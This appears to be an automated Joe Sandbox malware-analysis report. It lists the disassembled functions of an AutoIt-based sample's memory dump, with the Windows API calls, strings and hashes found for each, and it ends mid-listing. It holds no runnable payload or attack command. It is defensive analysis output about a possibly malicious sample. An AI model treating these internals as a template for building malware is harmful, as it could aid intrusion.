Part of subcall function 013473E8: GetSysColorBrush.USER32 ref: 0134743B
Part of subcall function 013473E8: GetSysColor.USER32 ref: 01347446
Part of subcall function 013473E8: GetSysColor.USER32 ref: 01347463
Part of subcall function 013473E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 01347471
Part of subcall function 013473E8: SelectObject.GDI32(?,00000000), ref: 01347482
Part of subcall function 013473E8: SetBkColor.GDI32(?,00000000), ref: 0134748B
Part of subcall function 013473E8: SelectObject.GDI32(?,?), ref: 01347498
Part of subcall function 013473E8: InflateRect.USER32 ref: 013474B7
Part of subcall function 013473E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 013474CE
Part of subcall function 013473E8: GetWindowLongW.USER32(00000000,000000F0), ref: 013474DB

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: d7199cea40196f780365f2d76d1283092f6d03452485509db6b6905a116517d0
Instruction ID: 572744b9da20e44702adab8b938a8e13e5784bd99fbd586154de49d7ce381636
Opcode Fuzzy Hash: d7199cea40196f780365f2d76d1283092f6d03452485509db6b6905a116517d0
Instruction Fuzzy Hash: 25A19F76009301EFDB219F64DC48A6BBBEDFB49324F101A19FA62961D0DB71E944CB91

Uniqueness

Uniqueness Score: -1.00%

Function 012C8D85 Relevance: 49.5, APIs: 26, Strings: 2, Instructions: 480windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32 ref: 012C8E14
SendMessageW.USER32(?,00001308,?,00000000), ref: 01306AC5
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 01306AFE
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 01306F43

Part of subcall function 012C8F62: InvalidateRect.USER32(?,00000000,00000001), ref: 012C8FC5

SendMessageW.USER32(?,00001053), ref: 01306F7F
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 01306F96
ImageList_Destroy.COMCTL32(00000000,?), ref: 01306FAC
ImageList_Destroy.COMCTL32(00000000,?), ref: 01306FB7

Strings

0, xrefs: 01306DCF
8lr, xrefs: 012C8DC2, 01306ADC, 01306B10, 01306B5F, 01306B9F, 01306C47, 01306CE8, 01306D8C, 01306E18, 01306EEF, 01306F15, 01306FC8

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
String ID: 0$8lr
API String ID: 2760611726-359200609
Opcode ID: 5399181a75dbd79e8e38f46f72dc695dc97fb269d9befe50b2c8c125ad107f87
Instruction ID: da227ed650eb0b6f85360be31cce190b7adc362e8e1c59cfd4239e0a7661d6f9
Opcode Fuzzy Hash: 5399181a75dbd79e8e38f46f72dc695dc97fb269d9befe50b2c8c125ad107f87
Instruction Fuzzy Hash: A612BE70611201DFDB26CF28C855BBABBE9FB44704F04856DF6598B296C731E8A2CF91

Uniqueness

Uniqueness Score: -1.00%

Function 01332711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32 ref: 0133273E
SystemParametersInfoW.USER32 ref: 0133286A
SetRect.USER32 ref: 013328A9
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 013328B9
CreateWindowExW.USER32 ref: 01332900
GetClientRect.USER32 ref: 0133290C
CreateWindowExW.USER32 ref: 01332955
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 01332964
GetStockObject.GDI32(00000011), ref: 01332974
SelectObject.GDI32(00000000,00000000), ref: 01332978
GetTextFaceW.GDI32(00000000,00000040,?), ref: 01332988
GetDeviceCaps.GDI32(00000000,0000005A), ref: 01332991
DeleteDC.GDI32(00000000), ref: 0133299A
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 013329C6
SendMessageW.USER32(00000030,00000000,00000001), ref: 013329DD
CreateWindowExW.USER32 ref: 01332A1D
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 01332A31
SendMessageW.USER32(00000404,00000001,00000000), ref: 01332A42
CreateWindowExW.USER32 ref: 01332A77
GetStockObject.GDI32(00000011), ref: 01332A82
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 01332A8D
ShowWindow.USER32(00000004), ref: 01332A97

Strings

msctls_progress32, xrefs: 01332A13
AutoIt v3, xrefs: 013328F8
DISPLAY, xrefs: 0133295A
static, xrefs: 0133294F, 01332A71

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 479f8fefc8c5f804504fc8dbca6361bef171a0f51bb5b49d272f002d0eb973b7
Instruction ID: 4bff5cef395aecbbaca19fc1f948c7f8c400b25bbcfd14ca142d6be98e06ae60
Opcode Fuzzy Hash: 479f8fefc8c5f804504fc8dbca6361bef171a0f51bb5b49d272f002d0eb973b7
Instruction Fuzzy Hash: 63B17E75A10205AFEB24DF68DC85FAF7BA9EB44714F008514FA15E7290DB74ED40CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 01324ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 01324AED
GetDriveTypeW.KERNEL32(?,0134CB68,?,\\.\,0134CC08), ref: 01324BCA
SetErrorMode.KERNEL32(00000000,0134CB68,?,\\.\,0134CC08), ref: 01324D36

Strings

Virtual, xrefs: 01324CE5
Fibre, xrefs: 01324CAD
CDROM, xrefs: 01324BFB
\\.\, xrefs: 01324B3F
RAID, xrefs: 01324CBB
SCSI, xrefs: 01324C8A
SSD, xrefs: 01324C4A
SSA, xrefs: 01324CA6
Network, xrefs: 01324C02
USB, xrefs: 01324CB4
RAMDisk, xrefs: 01324BF4
Unknown, xrefs: 01324BED, 01324C83
ATA, xrefs: 01324C98
ATAPI, xrefs: 01324C91
Fixed, xrefs: 01324C09
1394, xrefs: 01324C9F
SATA, xrefs: 01324CD0
iSCSI, xrefs: 01324CC2
MMC, xrefs: 01324CDE
FileBackedVirtual, xrefs: 01324CEC
SAS, xrefs: 01324CC9
Removable, xrefs: 01324C10, 01324C15
PhysicalDrive, xrefs: 01324B76

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 78a4ef11547d766ec688fe895014a7278ffccfa495a7de5872e1f2803f6942ca
Instruction ID: 9139f60cb1dc534055076764ded151a42f6fcb0ef4502974c1fc52e2dd22b130
Opcode Fuzzy Hash: 78a4ef11547d766ec688fe895014a7278ffccfa495a7de5872e1f2803f6942ca
Instruction Fuzzy Hash: E561E77061062AEBDF15FF1CC9929BC77E4EB0474CB10401AE806ABB55DB35ED81CB41

Uniqueness

Uniqueness Score: -1.00%

Function 013473E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32 ref: 01347421
SetTextColor.GDI32(?,?), ref: 01347425
GetSysColorBrush.USER32 ref: 0134743B
GetSysColor.USER32 ref: 01347446
CreateSolidBrush.GDI32(?), ref: 0134744B
GetSysColor.USER32 ref: 01347463
CreatePen.GDI32(00000000,00000001,00743C00), ref: 01347471
SelectObject.GDI32(?,00000000), ref: 01347482
SetBkColor.GDI32(?,00000000), ref: 0134748B
SelectObject.GDI32(?,?), ref: 01347498
InflateRect.USER32 ref: 013474B7
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 013474CE
GetWindowLongW.USER32(00000000,000000F0), ref: 013474DB
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0134752A
GetWindowTextW.USER32 ref: 01347554
InflateRect.USER32 ref: 01347572
DrawFocusRect.USER32 ref: 0134757D
GetSysColor.USER32 ref: 0134758E
SetTextColor.GDI32(?,00000000), ref: 01347596
DrawTextW.USER32(?,013470F5,000000FF,?,00000000), ref: 013475A8
SelectObject.GDI32(?,?), ref: 013475BF
DeleteObject.GDI32(?), ref: 013475CA
SelectObject.GDI32(?,?), ref: 013475D0
DeleteObject.GDI32(?), ref: 013475D5
SetTextColor.GDI32(?,?), ref: 013475DB
SetBkColor.GDI32(?,?), ref: 013475E5

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 09f3d6397f6a784b82d964eb882abde751a7a9014787872fb6394c77a81fe110
Instruction ID: fe52ece61b9099f91e2ec6e012eb77bcdfec27ee7d813d6ae69b88fd41668324
Opcode Fuzzy Hash: 09f3d6397f6a784b82d964eb882abde751a7a9014787872fb6394c77a81fe110
Instruction Fuzzy Hash: 57616D76901218AFDF119FA8DC48EAEBFB9EB08320F115155FA15BB291DB74A940CF90

Uniqueness

Uniqueness Score: -1.00%

Function 01340FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 01341128
GetDesktopWindow.USER32 ref: 0134113D
GetWindowRect.USER32(00000000), ref: 01341144
GetWindowLongW.USER32(?,000000F0), ref: 01341199
DestroyWindow.USER32 ref: 013411B9
CreateWindowExW.USER32 ref: 013411ED
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0134120B
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0134121D
SendMessageW.USER32(00000000,00000421,?,?), ref: 01341232
SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 01341245
IsWindowVisible.USER32(00000000), ref: 013412A1
SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 013412BC
SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 013412D0
GetWindowRect.USER32(00000000,?), ref: 013412E8
MonitorFromPoint.USER32(?,?,00000002), ref: 0134130E
GetMonitorInfoW.USER32(00000000,?), ref: 01341328
CopyRect.USER32(?,?), ref: 0134133F
SendMessageW.USER32(00000000,00000412,00000000), ref: 013413AA

Strings

(, xrefs: 0134131B
tooltips_class32, xrefs: 013411E6
0, xrefs: 013410D3

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: d1666994da70bd2cc43551568fd1616c95cace61dbf6cd33807d2d2d7b4d2bb5
Instruction ID: 12caa15733213f4652f6cb8304dc34e9ac0b0a0685a4bbbb0003ce24009b7da3
Opcode Fuzzy Hash: d1666994da70bd2cc43551568fd1616c95cace61dbf6cd33807d2d2d7b4d2bb5
Instruction Fuzzy Hash: A5B19D71614741AFD710DF68C884BAABBE8FF84354F04891CF9999B261CB71F884CB92

Uniqueness

Uniqueness Score: -1.00%

Function 01340241 Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 013402E5
_wcslen.LIBCMT ref: 0134031F
_wcslen.LIBCMT ref: 01340389
_wcslen.LIBCMT ref: 013403F1
_wcslen.LIBCMT ref: 01340475
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 013404C5
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 01340504

Part of subcall function 012CF9F2: _wcslen.LIBCMT ref: 012CF9FD

Part of subcall function 0131223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 01312258
Part of subcall function 0131223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0131228A

Strings

SELECT, xrefs: 01340548
SELECTCLEAR, xrefs: 0134052D
ISSELECTED, xrefs: 013404DD
GETSELECTEDCOUNT, xrefs: 01340470, 0134048B
GETSELECTED, xrefs: 013405E1
SELECTALL, xrefs: 01340515
VIEWCHANGE, xrefs: 01340675
GETTEXT, xrefs: 013403EC, 01340407
DESELECT, xrefs: 0134059C
FINDITEM, xrefs: 01340627
SELECTINVERT, xrefs: 0134057E
GETSUBITEMCOUNT, xrefs: 01340384, 0134039F
GETITEMCOUNT, xrefs: 01340316, 01340337

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 1103490817-719923060
Opcode ID: 3d5c94c93bcbcc65ca1aae45ffc5e5a8c11732771c0a2ff92f9a5e55c9b0cf0d
Instruction ID: a4598c1f5512be78400dded28c7b966141c106fc92d91e94e63b84ba96ebe9fe
Opcode Fuzzy Hash: 3d5c94c93bcbcc65ca1aae45ffc5e5a8c11732771c0a2ff92f9a5e55c9b0cf0d
Instruction Fuzzy Hash: FBE1D1313182028FCB18DF28C5908BAB7E5FF98758B14495CF996AB7A4DB34ED45CB81

Uniqueness

Uniqueness Score: -1.00%

Function 012C8891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32 ref: 012C8968
GetSystemMetrics.USER32 ref: 012C8970
SystemParametersInfoW.USER32 ref: 012C899B
GetSystemMetrics.USER32 ref: 012C89A3
GetSystemMetrics.USER32 ref: 012C89C8
SetRect.USER32 ref: 012C89E5
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 012C89F5
CreateWindowExW.USER32 ref: 012C8A28
SetWindowLongW.USER32 ref: 012C8A3C
GetClientRect.USER32 ref: 012C8A5A
GetStockObject.GDI32(00000011), ref: 012C8A76
SendMessageW.USER32(00000000,00000030,00000000), ref: 012C8A81

Part of subcall function 012C912D: GetCursorPos.USER32(?), ref: 012C9141
Part of subcall function 012C912D: ScreenToClient.USER32(00000000,?), ref: 012C915E
Part of subcall function 012C912D: GetAsyncKeyState.USER32 ref: 012C9183
Part of subcall function 012C912D: GetAsyncKeyState.USER32 ref: 012C919D

SetTimer.USER32(00000000,00000000,00000028,012C90FC), ref: 012C8AA8

Strings

AutoIt v3 GUI, xrefs: 012C8A20

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: 00da7f46d82acd9ac43d517084b5a512fc4a0c3c1505eb8e965420e869732574
Instruction ID: 3acdb630eea712b4e0f9a11da0a0ea81e0d2710b40d9254bc4f785e251396d16
Opcode Fuzzy Hash: 00da7f46d82acd9ac43d517084b5a512fc4a0c3c1505eb8e965420e869732574
Instruction Fuzzy Hash: 37B17D75A1020AEFDF15DFA8C846BEE3BB9FB48714F008219FA15A7284DB74E851CB54

Uniqueness

Uniqueness Score: -1.00%

Function 01310D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 013110F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 01311114
Part of subcall function 013110F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,01310B9B,?,?,?), ref: 01311120
Part of subcall function 013110F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,01310B9B,?,?,?), ref: 0131112F
Part of subcall function 013110F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,01310B9B,?,?,?), ref: 01311136
Part of subcall function 013110F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0131114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 01310DF5
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 01310E29
GetLengthSid.ADVAPI32(?), ref: 01310E40
GetAce.ADVAPI32(?,00000000,?), ref: 01310E7A
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 01310E96
GetLengthSid.ADVAPI32(?), ref: 01310EAD
GetProcessHeap.KERNEL32(00000008,00000008), ref: 01310EB5
HeapAlloc.KERNEL32(00000000), ref: 01310EBC
GetLengthSid.ADVAPI32(?,00000008,?), ref: 01310EDD
CopySid.ADVAPI32(00000000), ref: 01310EE4
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 01310F13
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 01310F35
SetUserObjectSecurity.USER32(?,00000004,?), ref: 01310F47
GetProcessHeap.KERNEL32(00000000,00000000), ref: 01310F6E
HeapFree.KERNEL32(00000000), ref: 01310F75
GetProcessHeap.KERNEL32(00000000,00000000), ref: 01310F7E
HeapFree.KERNEL32(00000000), ref: 01310F85
GetProcessHeap.KERNEL32(00000000,00000000), ref: 01310F8E
HeapFree.KERNEL32(00000000), ref: 01310F95
GetProcessHeap.KERNEL32(00000000,?), ref: 01310FA1
HeapFree.KERNEL32(00000000), ref: 01310FA8

Part of subcall function 01311193: GetProcessHeap.KERNEL32(00000008,01310BB1,?,00000000,?,01310BB1,?), ref: 013111A1
Part of subcall function 01311193: HeapAlloc.KERNEL32(00000000,?,00000000,?,01310BB1,?), ref: 013111A8
Part of subcall function 01311193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,01310BB1,?), ref: 013111B7

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: d75921db827baee46b0c5694aae4957668ccad548ae6db9849c8d550615684b9
Instruction ID: 63c3db85e12e26e0243eff660471146294456bc565c15fb93cbada99700fd750
Opcode Fuzzy Hash: d75921db827baee46b0c5694aae4957668ccad548ae6db9849c8d550615684b9
Instruction Fuzzy Hash: F5715E7590120AABEB289FA9DC45FEEBBBCBF05314F044115FA19E6184DB31A949CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0133C3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0133C4BD
RegCreateKeyExW.ADVAPI32(?,?,00000000,0134CC08,00000000,?,00000000,?,?), ref: 0133C544
RegCloseKey.ADVAPI32(00000000), ref: 0133C5A4
_wcslen.LIBCMT ref: 0133C5F4
_wcslen.LIBCMT ref: 0133C66F
RegSetValueExW.ADVAPI32 ref: 0133C6B2
RegSetValueExW.ADVAPI32 ref: 0133C7C1
RegSetValueExW.ADVAPI32 ref: 0133C84D
RegCloseKey.ADVAPI32(?), ref: 0133C881
RegCloseKey.ADVAPI32(00000000), ref: 0133C88E
RegSetValueExW.ADVAPI32 ref: 0133C960

Strings

REG_DWORD, xrefs: 0133C804
REG_SZ, xrefs: 0133C644
REG_BINARY, xrefs: 0133C913
REG_EXPAND_SZ, xrefs: 0133C5CD
REG_QWORD, xrefs: 0133C8C3
REG_MULTI_SZ, xrefs: 0133C6F5

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Value$Close$_wcslen$ConnectCreateRegistry
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 9721498-966354055
Opcode ID: 2c54b47d343916a01613c2c1bca76db6486a37ad1bbb3fec6b60bfc69f0011ac
Instruction ID: fb2a861841fc9da582790d3cdee1ec617edbd0cf67f82ffeb314b321708f0cf6
Opcode Fuzzy Hash: 2c54b47d343916a01613c2c1bca76db6486a37ad1bbb3fec6b60bfc69f0011ac
Instruction Fuzzy Hash: 6B129C356142019FD714DF18C880E6ABBE5FF88768F04885DE98AAB7A1DB31FD41CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0134091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 013409C6
_wcslen.LIBCMT ref: 01340A01
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 01340A54
_wcslen.LIBCMT ref: 01340A8A
_wcslen.LIBCMT ref: 01340B06
_wcslen.LIBCMT ref: 01340B81

Part of subcall function 012CF9F2: _wcslen.LIBCMT ref: 012CF9FD

Part of subcall function 01312BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 01312BFA

Strings

COLLAPSE, xrefs: 01340B01, 01340B1C
GETTEXT, xrefs: 01340C97
SELECT, xrefs: 01340D11
EXISTS, xrefs: 01340B7C, 01340B97
ISCHECKED, xrefs: 01340CE1
GETITEMCOUNT, xrefs: 01340C1E
GETTOTALCOUNT, xrefs: 013409F2, 01340A17
EXPAND, xrefs: 01340BF8
GETSELECTED, xrefs: 01340C4E
UNCHECK, xrefs: 01340D3E
CHECK, xrefs: 01340A85, 01340AA0

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 1103490817-4258414348
Opcode ID: d5e44e44bf4647710f9801f8c1cb5ec785a5d8f710991b89372faf4125925db9
Instruction ID: 9c2841ccea28c5389cf877f828dec54429594f81f042876931f2a4e111f7b50e
Opcode Fuzzy Hash: d5e44e44bf4647710f9801f8c1cb5ec785a5d8f710991b89372faf4125925db9
Instruction Fuzzy Hash: ADE1AD352183428FCB18DF28C4908AAB7E1BF98358B04895DF9969B7A1D731FD49CB81

Uniqueness

Uniqueness Score: -1.00%

Function 0133C998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON

Download Yara Rule

APIs

